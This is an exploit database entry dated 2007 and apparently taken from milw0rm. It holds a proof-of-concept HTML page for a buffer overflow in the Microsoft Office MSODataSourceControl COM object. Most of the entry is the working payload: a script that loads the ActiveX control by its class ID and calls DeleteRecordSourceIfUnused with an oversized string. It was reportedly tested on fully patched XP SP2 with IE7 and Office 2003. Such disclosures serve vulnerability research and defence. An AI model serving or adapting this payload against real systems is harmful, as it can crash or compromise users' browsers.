Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)

2007-06-13T00:00:00
ID EXPLOITPACK:0CD659C4196888A8C37282194C8330C3
Type exploitpack
Reporter YAG KOHHA
Modified 2007-06-13T00:00:00

Description

Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)

                                        
                                            MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# milw0rm.com [2007-06-13]